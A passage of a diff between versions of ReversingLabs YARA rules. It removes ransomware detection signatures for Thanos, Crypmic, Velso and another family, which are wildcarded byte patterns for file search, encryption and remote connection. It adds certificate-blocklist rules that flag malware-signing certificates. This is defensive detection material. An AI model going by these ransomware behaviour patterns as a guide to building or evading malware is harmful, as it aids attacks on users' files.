CE 85 C9 0F 84 ?? ?? ?? ?? 85 C0 74 ?? 6A ?? FF 75 ?? FF D0 EB ?? 8B C6 85 C0 0F 84 - ?? ?? ?? ?? 56 8D 45 ?? 50 68 ?? ?? ?? ?? 8B 7D ?? 57 53 FF 15 ?? ?? ?? ?? 85 C0 75 - ?? 83 CF ?? 89 7D ?? E9 ?? ?? ?? ?? 8B 45 ?? 3B C6 7C ?? 8B 4D ?? 7F ?? 81 F9 ?? ?? - ?? ?? 76 ?? 81 E9 ?? ?? ?? ?? 1B C6 50 51 33 D2 8B CB E8 ?? ?? ?? ?? 59 59 23 C2 89 - } - $encrypt_files_p2 = { - 75 ?? 85 F6 75 ?? 56 8D 45 ?? 50 68 ?? ?? ?? ?? 8B 45 ?? 03 C7 50 53 FF 15 ?? ?? ?? - ?? 8B FE 89 7D ?? EB ?? 56 56 6A ?? 5A 8B CB E8 ?? ?? ?? ?? 59 59 23 C2 8B FE 89 7D - ?? 85 FF 75 ?? 56 8D 45 ?? 50 6A ?? FF 75 ?? 53 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? - ?? ?? 8B 4D ?? FF 71 ?? FF 71 ?? 8D 41 ?? 50 FF 71 ?? 6A ?? 5A 8B 4D ?? E8 ?? ?? ?? - ?? 83 C4 ?? 0F B6 C0 23 F8 89 7D ?? 0F 85 ?? ?? ?? ?? 56 8D 45 ?? 50 8B 45 ?? FF 70 - ?? FF 70 ?? 53 FF 15 ?? ?? ?? ?? 56 8D 45 ?? 50 8B 45 ?? FF 70 ?? FF 70 ?? 53 FF 15 - ?? ?? ?? ?? 51 8B 55 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 51 8D 45 ?? 50 8B 55 ?? 52 - 8B 4D ?? 8B 45 ?? 03 C1 50 52 51 51 8B 55 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 - ?? 85 C0 75 ?? 56 8D 45 ?? 50 6A ?? 8D 45 ?? 50 53 FF 15 ?? ?? ?? ?? 53 FF 15 ?? ?? - ?? ?? 56 56 33 D2 8B CB E8 ?? ?? ?? ?? 59 59 56 8D 45 ?? 50 FF 75 ?? FF 75 ?? 53 FF - 15 ?? ?? ?? ?? 83 7D ?? ?? 76 ?? 8B 45 ?? 2D ?? ?? ?? ?? 8B 4D ?? 1B CE 51 50 33 D2 - 8B CB E8 ?? ?? ?? ?? 59 59 56 8D 45 ?? 50 FF 75 ?? 8B 45 ?? 03 45 ?? 50 53 FF 15 ?? - ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 83 4D ?? ?? E8 ?? ?? ?? ?? 8B C7 E8 ?? ?? ?? ?? C3 - } - $find_volumes = { - 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? BE ?? ?? ?? ?? 56 33 DB 53 8D 85 ?? ?? - ?? ?? 50 E8 ?? ?? ?? ?? 56 53 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? - ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B F8 89 7D ?? 83 FF ?? 0F 84 ?? ?? ?? - ?? 89 5D ?? 6A ?? 5B 8D B5 ?? ?? ?? ?? 8D 4E ?? 33 D2 66 8B 06 83 C6 ?? 66 3B C2 75 - ?? 2B F1 D1 FE 66 39 9D ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 66 39 9D ?? ?? ?? ?? 75 ?? 66 - 83 BD ?? ?? ?? ?? ?? 75 ?? 66 39 9D ?? ?? ?? ?? 75 ?? 66 39 9C 75 ?? ?? ?? ?? 75 ?? - 33 C0 66 89 84 75 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? - 50 FF 15 ?? ?? ?? ?? 66 89 9C 75 ?? ?? ?? ?? 85 C0 74 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? - ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? - ?? FF 15 ?? ?? ?? ?? 89 45 ?? 83 4D ?? ?? E8 ?? ?? ?? ?? EB ?? 8B 7D ?? 57 FF 15 ?? - ?? ?? ?? 8B 65 ?? E8 ?? ?? ?? ?? C3 - } - condition: - uint16(0)==0x5A4D and ($find_volumes) and ( all of ($find_files_p*)) and ( all of ($encrypt_files_p*)) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "DRAGON BUSINESS EQUIPMENT LIMITED" and pe.signatures[i].serial=="28:5e:cc:bd:1d:00:00:e6:40:b8:43:07:ef:88:cd:9f" and 1611619200<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Thanos : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_55Ab71A3F9Dde3Ef20C788Dd1D5Ff6C3 : INFO FILE { meta: - description = "Yara rule that detects Thanos ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "e607255d-45a6-573d-956e-f6faa2aa7e9f" - date = "2021-08-12" - modified = "2021-08-12" + id = "c8b5b632-26e6-5a78-99be-b50b1240dbec" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/ByteCode.MSIL.Ransomware.Thanos.yara#L1-L106" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "f6bc0c2188a04d2fb2a82a6b6d6cdf7763c32047bec725fe07f01415edf0b4cd" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L15554-L15570" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "4bee740eaf359462cd85c6232160c6b1fc3df67acfe731da9978f0b8a304a93f" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "Thanos" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $find_files_p1 = { - 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 16 FE 01 2B ?? 16 00 13 ?? 11 ?? 2D ?? DD - ?? ?? ?? ?? 08 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 08 6F ?? ?? ?? ?? 6C 7E ?? ?? ?? ?? - 28 ?? ?? ?? ?? 23 ?? ?? ?? ?? ?? ?? ?? ?? 5A 23 ?? ?? ?? ?? ?? ?? ?? ?? 5A 35 ?? 7E ?? - ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 16 FE 01 2B ?? 17 00 13 ?? 11 ?? 2D ?? 00 06 08 - 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 00 2B ?? 08 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 7E ?? - ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 16 FE 01 2B ?? 17 00 13 ?? 11 ?? 2D ?? 00 06 08 - 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 00 00 DE ?? 26 00 00 DE ?? 26 00 00 DE ?? 00 00 00 11 - ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 3A ?? ?? ?? ?? DE ?? 11 ?? 14 FE 01 13 ?? 11 ?? 2D ?? 11 - ?? 6F ?? ?? ?? ?? 00 DC 00 00 07 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 38 - ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 0D 00 07 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? - 6F ?? ?? ?? ?? 2D ?? 07 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D - ?? 07 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 07 6F ?? ?? ?? - ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 07 6F ?? ?? ?? ?? 6F - } - $find_files_p2 = { - 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 07 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F - ?? ?? ?? ?? 16 FE 01 2B ?? 16 00 13 ?? 11 ?? 2D ?? 38 ?? ?? ?? ?? 00 00 09 72 ?? ?? ?? - ?? 17 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 38 ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 0C 00 00 - 08 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 3A ?? ?? ?? ?? 08 6F ?? - ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 3A ?? ?? ?? ?? 08 6F ?? ?? ?? ?? - 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 3A ?? ?? ?? ?? 08 6F ?? ?? ?? ?? 6F ?? ?? - ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 3A - } - $find_files_p3 = { - 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 3A ?? ?? ?? ?? 08 6F ?? ?? - ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 3A ?? ?? ?? ?? 08 6F ?? ?? ?? ?? 6F - ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 08 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 00 6F - ?? ?? ?? ?? 2D ?? 08 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 08 6F ?? ?? ?? - ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 08 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? - 2D ?? 08 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 08 6F ?? ?? ?? ?? 72 ?? ?? - ?? ?? 6F ?? ?? ?? ?? 16 FE 01 2B ?? 16 00 13 ?? 11 ?? 2D ?? DD ?? ?? ?? ?? 08 6F ?? ?? - ?? ?? 28 ?? ?? ?? ?? 2C ?? 08 6F ?? ?? ?? ?? 6C 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 23 ?? ?? - ?? ?? ?? ?? ?? ?? 5A 23 ?? ?? ?? ?? ?? ?? ?? ?? 5A 35 ?? 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? - 28 ?? ?? ?? ?? 16 FE 01 2B ?? 17 00 13 ?? 11 ?? 2D ?? 00 06 08 6F ?? ?? ?? ?? 6F ?? ?? - ?? ?? 00 00 2B ?? 08 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? - 28 ?? ?? ?? ?? 16 FE 01 2B ?? 17 00 13 ?? 11 ?? 2D ?? 00 06 08 6F ?? ?? ?? ?? 6F ?? ?? - ?? ?? 00 00 00 DE ?? 26 00 00 DE ?? 26 00 00 DE ?? 00 00 00 11 ?? 6F ?? ?? ?? ?? 13 ?? - 11 ?? 3A ?? ?? ?? ?? DE ?? 11 ?? 14 FE 01 13 ?? 11 ?? 2D ?? 11 ?? 6F ?? ?? ?? ?? 00 DC - 00 00 DE ?? 26 00 00 DE ?? 26 00 00 DE ?? 00 00 11 ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 3A ?? - ?? ?? ?? DE ?? 11 ?? 14 FE 01 13 ?? 11 ?? 2D ?? 11 ?? 6F ?? ?? ?? ?? 00 DC 00 00 DE ?? - 26 00 00 DE ?? 26 00 00 DE ?? 26 00 00 DE ?? 26 00 00 DE ?? 00 06 13 ?? 2B ?? 11 ?? 2A - } - $encrypt_files = { - 73 ?? ?? ?? ?? 13 ?? 11 ?? 03 7D ?? ?? ?? ?? 11 ?? 04 7D ?? ?? ?? ?? 11 ?? 05 7D ?? ?? - ?? ?? 11 ?? 0E ?? 7D ?? ?? ?? ?? 00 28 ?? ?? ?? ?? 11 ?? 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? - 80 ?? ?? ?? ?? 02 16 9A 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 16 FE 01 13 ?? 11 ?? 2D ?? 00 28 - ?? ?? ?? ?? 0A 06 8E 69 16 FE 02 16 FE 01 13 ?? 11 ?? 2D ?? 00 16 0B 2B ?? 00 06 07 9A - 6F ?? ?? ?? ?? 16 FE 01 13 ?? 11 ?? 2D ?? 00 7E ?? ?? ?? ?? 06 07 9A 6F ?? ?? ?? ?? 6F - ?? ?? ?? ?? 13 ?? 11 ?? 2D ?? 00 7E ?? ?? ?? ?? 06 07 9A 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? - 00 00 00 00 07 17 58 0B 07 06 8E 69 FE 04 13 ?? 11 ?? 2D ?? 00 00 2B ?? 00 16 0B 2B ?? - 00 7E ?? ?? ?? ?? 02 07 9A 6F ?? ?? ?? ?? 13 ?? 11 ?? 2D ?? 00 7E ?? ?? ?? ?? 02 07 9A - 6F ?? ?? ?? ?? 00 00 00 07 17 58 0B 07 02 8E 69 FE 04 13 ?? 11 ?? 2D ?? 00 7E ?? ?? ?? - ?? 72 ?? ?? ?? ?? 00 6F ?? ?? ?? ?? 2C ?? 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? - 16 FE 01 2B ?? 17 00 13 ?? 11 ?? 2D ?? 00 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 00 6F ?? ?? ?? - ?? 26 00 00 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 38 ?? ?? ?? ?? 14 0D 73 ?? ?? ?? ?? 13 - ?? 11 ?? 11 ?? 7D ?? ?? ?? ?? 11 ?? 12 ?? 28 ?? ?? ?? ?? 7D ?? ?? ?? ?? 00 7E ?? ?? ?? - ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 16 FE 01 13 ?? 11 ?? 2D ?? 00 09 2D ?? 11 ?? FE 06 ?? - ?? ?? ?? 73 ?? ?? ?? ?? 0D 2B ?? 09 73 ?? ?? ?? ?? 0C 08 1A 6F ?? ?? ?? ?? 00 08 16 6F - ?? ?? ?? ?? 00 08 6F ?? ?? ?? ?? 00 08 6F ?? ?? ?? ?? 00 00 2B ?? 00 11 ?? 7B ?? ?? ?? - ?? 11 ?? 7B ?? ?? ?? ?? 11 ?? 7B ?? ?? ?? ?? 11 ?? 7B ?? ?? ?? ?? 11 ?? 7B ?? ?? ?? ?? - 28 ?? ?? ?? ?? 00 00 00 12 ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 3A ?? ?? ?? ?? DE ?? 12 ?? FE - 16 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 DC 00 00 2A - } - $remote_connection = { - 00 00 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 16 19 6F ?? ?? ?? ?? - 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A 73 ?? ?? ?? ?? 0B 07 02 28 ?? ?? ?? ?? 06 28 ?? ?? ?? - ?? 6F ?? ?? ?? ?? 00 28 ?? ?? ?? ?? 06 28 ?? ?? ?? ?? 0C DE ?? 26 00 00 DE ?? 00 7E ?? - ?? ?? ?? 0C 2B ?? 00 08 2A - } - condition: - uint16(0)==0x5A4D and ( all of ($find_files_p*)) and ($encrypt_files) and ($remote_connection) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Zhengzhoushi Tiekelian Information Technology Co.,Ltd" and pe.signatures[i].serial=="55:ab:71:a3:f9:dd:e3:ef:20:c7:88:dd:1d:5f:f6:c3" and 1323907200<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_Crypmic : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_4Beca26210737A5442Ff8B47 : INFO FILE { meta: - description = "Yara rule that detects Crypmic ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "0d5c2141-c0ca-53c8-91fd-ec2d5f163df2" - date = "2020-07-15" - modified = "2020-07-15" + id = "30570c07-9ba1-5b7c-a369-c6def80f9dc5" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.Crypmic.yara#L1-L56" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "ee97c4d35cee68e080a4e9e0a21ecd3698da638463881a58f5daaf906ef86f75" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L15572-L15588" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "7a1130413ae8807dc1ec96a6b1c3bac705a1520f7268db2848b997f6f3f9fc9b" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "Crypmic" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $search_and_encrypt_1 = { - 55 8B EC 81 EC ?? ?? ?? ?? 53 56 B8 ?? ?? ?? ?? 57 8B F9 89 7D ?? C7 45 ?? ?? ?? ?? - ?? 89 45 ?? 8D 50 ?? 68 ?? ?? ?? ?? 6A ?? FF 77 ?? 66 89 85 ?? ?? ?? ?? 8B 47 ?? C7 - 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? FF D0 66 8B 95 ?? ?? ?? ?? 33 F6 33 - C9 89 45 ?? 66 3B F2 74 ?? 0F B7 D2 41 66 89 14 06 8D 34 09 33 DB 0F B7 94 35 ?? ?? - ?? ?? 66 3B DA 75 ?? BA ?? ?? ?? ?? 66 89 14 48 8D 1C 48 8D 8D ?? ?? ?? ?? 51 C7 43 - ?? ?? ?? ?? ?? 50 8B 47 ?? FF D0 8B F0 83 FE ?? 0F 84 ?? ?? ?? ?? F6 85 ?? ?? ?? ?? - ?? 74 ?? 66 8B 8D ?? ?? ?? ?? 66 83 F9 ?? 74 ?? 66 83 BD ?? ?? ?? ?? ?? 74 ?? 33 D2 - 33 C0 66 3B D1 74 ?? 0F B7 C9 8B FF 40 66 89 4C 1A ?? 8D 14 00 C7 45 ?? ?? ?? ?? ?? - 0F B7 8C 15 ?? ?? ?? ?? 66 39 4D ?? 75 ?? 8B 55 ?? 33 C9 66 89 4C 43 ?? 68 ?? ?? ?? - ?? 8B CF E8 ?? ?? ?? ?? 83 C4 ?? 01 45 ?? 8D 85 ?? ?? ?? ?? 50 8B 47 ?? 56 FF D0 85 - C0 75 ?? 8B 47 ?? 56 FF D0 8D 85 ?? ?? ?? ?? 50 FF 75 ?? C7 43 ?? ?? ?? ?? ?? 8B 47 - } - $search_and_encrypt_2 = { - 33 F6 89 75 ?? FF D0 89 45 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? EB ?? 8D 9B ?? ?? ?? ?? - F6 85 ?? ?? ?? ?? ?? 75 ?? 66 8B BD ?? ?? ?? ?? 33 F6 8B 8E ?? ?? ?? ?? 8D 95 ?? ?? - ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? BA ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 66 83 FF ?? 75 ?? - EB ?? 8D 9B ?? ?? ?? ?? 66 8B 48 ?? 83 C0 ?? 83 C2 ?? 66 3B 0A 74 ?? 66 83 38 ?? 0F - 85 ?? ?? ?? ?? 66 83 3A ?? 0F 85 ?? ?? ?? ?? 83 C6 ?? 81 FE ?? ?? ?? ?? 72 ?? 8B 7D - ?? 8B 75 ?? 8B 45 ?? 8D 8D ?? ?? ?? ?? 51 50 8B 47 ?? FF D0 85 C0 8B 45 ?? 0F 85 ?? - ?? ?? ?? 50 8B 47 ?? FF D0 85 F6 74 ?? 8B 55 ?? 33 C0 8B CF 66 89 43 ?? E8 ?? ?? ?? - ?? FF 75 ?? 8B 47 ?? 6A ?? FF 77 ?? FF D0 8B 45 ?? 8B 5D ?? 03 C6 03 D8 8B 45 ?? 40 - 89 5D ?? 89 45 ?? BA ?? ?? ?? ?? 83 F8 ?? 0F 8E ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? - ?? ?? ?? 50 8B 47 ?? 68 ?? ?? ?? ?? FF D0 68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B CF E8 - ?? ?? ?? ?? 83 C4 ?? 03 C3 5F 5E 5B 8B E5 5D C3 33 C9 33 C0 66 3B CF 74 ?? 0F B7 CF - 33 D2 8D 9B ?? ?? ?? ?? 40 66 89 4C 1A ?? 8D 14 00 33 F6 0F B7 8C 15 ?? ?? ?? ?? 66 - 3B F1 75 ?? 8B 75 ?? FF 75 ?? 8B 7D ?? 33 C9 46 57 66 89 4C 43 ?? 89 75 ?? E8 ?? ?? - ?? ?? E9 - } - condition: - uint16(0)==0x5A4D and (( all of ($search_and_encrypt_*))) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "VANKY TECHNOLOGY LIMITED" and pe.signatures[i].serial=="4b:ec:a2:62:10:73:7a:54:42:ff:8b:47" and 1476437049<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_Velso : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_0F203839A9C63B8798A7Cb31 : INFO FILE { meta: - description = "Yara rule that detects Velso ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "72c7baaa-4f83-54c5-ba71-2b45e5eeefd2" - date = "2020-07-15" - modified = "2020-07-15" + id = "dc8428f3-ff28-5fcf-9855-f20c68973afe" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.Velso.yara#L1-L230" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "602be848a26106a1bd46cfc515578f0628687e6cb352e609a274220a61bcb620" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L15590-L15606" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "604ba3fa671cc98e42caf80d07bc9650d193f898413517b46482f183b0f7008a" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "Velso" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $find_files_p1 = { - 55 89 E5 81 EC ?? ?? ?? ?? 8D 45 ?? 89 A5 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? - C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 85 - ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? 8B 4D ?? C7 85 ?? ?? ?? ?? - ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? 85 C0 75 ?? C6 85 ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? - ?? 89 04 24 E8 ?? ?? ?? ?? 0F B6 85 ?? ?? ?? ?? C9 C3 C7 04 24 ?? ?? ?? ?? 8B 4D ?? - C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? 85 C0 74 ?? C7 04 24 ?? ?? ?? - ?? 8B 4D ?? E8 ?? ?? ?? ?? 83 EC ?? 85 C0 74 ?? C7 04 24 ?? ?? ?? ?? 8B 4D ?? E8 ?? - ?? ?? ?? 83 EC ?? 85 C0 74 ?? C7 04 24 ?? ?? ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 83 EC ?? - 85 C0 74 ?? C7 04 24 ?? ?? ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 83 EC ?? 85 C0 0F 84 ?? ?? - ?? ?? C7 04 24 ?? ?? ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 83 EC ?? 85 C0 0F 84 ?? ?? ?? ?? - C7 04 24 ?? ?? ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 83 EC ?? 85 C0 0F 84 ?? ?? ?? ?? C7 04 - 24 ?? ?? ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 85 C0 51 0F 84 ?? ?? ?? ?? C7 04 24 ?? ?? ?? - ?? 8B 4D ?? E8 ?? ?? ?? ?? 85 C0 52 0F 84 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? 8B 4D ?? - E8 ?? ?? ?? ?? 85 C0 51 0F 84 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? 8B 4D ?? E8 ?? ?? ?? - ?? 85 C0 52 0F 84 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 44 24 ?? 8D 85 ?? - ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 04 24 8B 4D ?? C7 85 ?? ?? ?? - ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 51 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 39 D0 74 ?? 89 - 04 24 E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 44 24 ?? 8D 85 ?? ?? ?? ?? - 89 04 24 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 44 24 - } - $find_files_p2 = { - 8B 85 ?? ?? ?? ?? 89 04 24 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 52 52 8D 95 - ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 39 D0 74 ?? 89 04 24 E8 ?? ?? ?? ?? - EB ?? 8D 85 ?? ?? ?? ?? 89 44 24 ?? 8B 85 ?? ?? ?? ?? 89 04 24 C7 85 ?? ?? ?? ?? ?? - ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 52 52 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C7 44 24 ?? - ?? ?? ?? ?? 89 04 24 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 51 51 74 ?? - 8D 85 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 85 C0 52 52 74 ?? - F6 85 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 4D ?? 89 85 ?? ?? ?? ?? - 8B 45 ?? 8B 51 ?? 8D 8D ?? ?? ?? ?? 8B 00 01 C2 89 04 24 89 54 24 ?? C7 85 ?? ?? ?? - ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 51 51 89 44 24 ?? 8B 45 ?? 89 44 24 - ?? 8D 85 ?? ?? ?? ?? 89 04 24 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? - ?? ?? ?? 89 44 24 ?? 8B 45 ?? 89 44 24 ?? 8D 85 ?? ?? ?? ?? 89 04 24 C7 85 ?? ?? ?? - ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 39 D0 74 ?? 89 04 - 24 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 39 D0 0F 84 ?? ?? ?? ?? 89 04 - 24 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 44 24 ?? 8B 45 ?? 89 44 24 ?? - 8D 85 ?? ?? ?? ?? 89 04 24 